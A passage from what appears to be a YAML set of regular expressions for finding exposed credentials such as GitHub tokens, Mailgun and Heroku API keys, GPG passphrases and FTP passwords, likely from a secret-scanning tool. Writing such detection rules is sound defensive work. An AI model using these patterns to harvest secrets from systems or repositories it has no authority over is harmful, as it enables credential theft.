]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailer[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailchimp[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailchimp[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mail[_-]?password[\\\"']?[^\\\\S\\r\n\n 
]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?magento[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?magento[_-]?auth[_-]?username [\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?magento[_-]?auth[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?s3[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?happo[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lottie[_-]?happo[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ll[_-]?shared[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ll[_-]?publish[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?linux[_-]?signing[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lighthouse[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?lektor[_-]?deploy[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?lektor[_-]?deploy[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?leanplum[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kxoltsn3vogdop92m[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kubeconfig[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kubecfg[_-]?s3[_-]?path[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kovan[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?keystore[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kafka[_-]?rest[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kafka[_-]?instance[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?kafka[_-]?admin[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jwt[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jdbc:mysql[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jdbc[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?jdbc[_-]?databaseurl[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?itest[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ios[_-]?docs[_-]?deploy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?internal[_-]?secrets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?integration[_-]?test[_-]?appid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 
]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?integration[_-]?test[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?index[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ij[_-]?repo[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ij[_-]?repo[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hub[_-]?dxia2[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?homebrew[_-]?github[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hockeyapp[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?heroku[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?heroku[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?heroku[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hb[_-]?codesign[_-]?key[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hab[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?hab[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?grgit[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gren[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gradle[_-]?signing[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?gradle[_-]?signing[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gradle[_-]?publish[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gradle[_-]?publish[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?secret[_-]?keys[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?passphrase[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?ownertrust[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?keyname[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gpg[_-]?key[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?maps[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?client[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?client[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?google[_-]?account[_-]?type[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gogs[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gitlab[_-]?user[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?github[_-]?tokens[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?repo[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?release[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?pwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?oauth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?hunter[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?hunter[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?deployment[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?github[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?github[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?committer[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?committer[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?author[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?git[_-]?author[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ghost[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ghb[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?repo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gh[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcs[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcr[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcloud[_-]?service[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcloud[_-]?project[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?gcloud[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?pw[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?login[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ftp[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?fossa[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?flickr[_-]?api[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?flickr[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 
]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?flask[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firefox[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?project[_-]?develop[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?firebase[_-]?api[_-]?json[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?file[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?exp[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?eureka[_-]?awssecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?sonatype[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?heroku[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?env[_-]?github[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?end[_-]?user[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?encryption[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?elasticsearch[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?elastic[_-]?cloud[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dsonar[_-]?projectkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dsonar[_-]?login[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?droplet[_-]?travis[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?dropbox[_-]?oauth[_-]?bearer[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 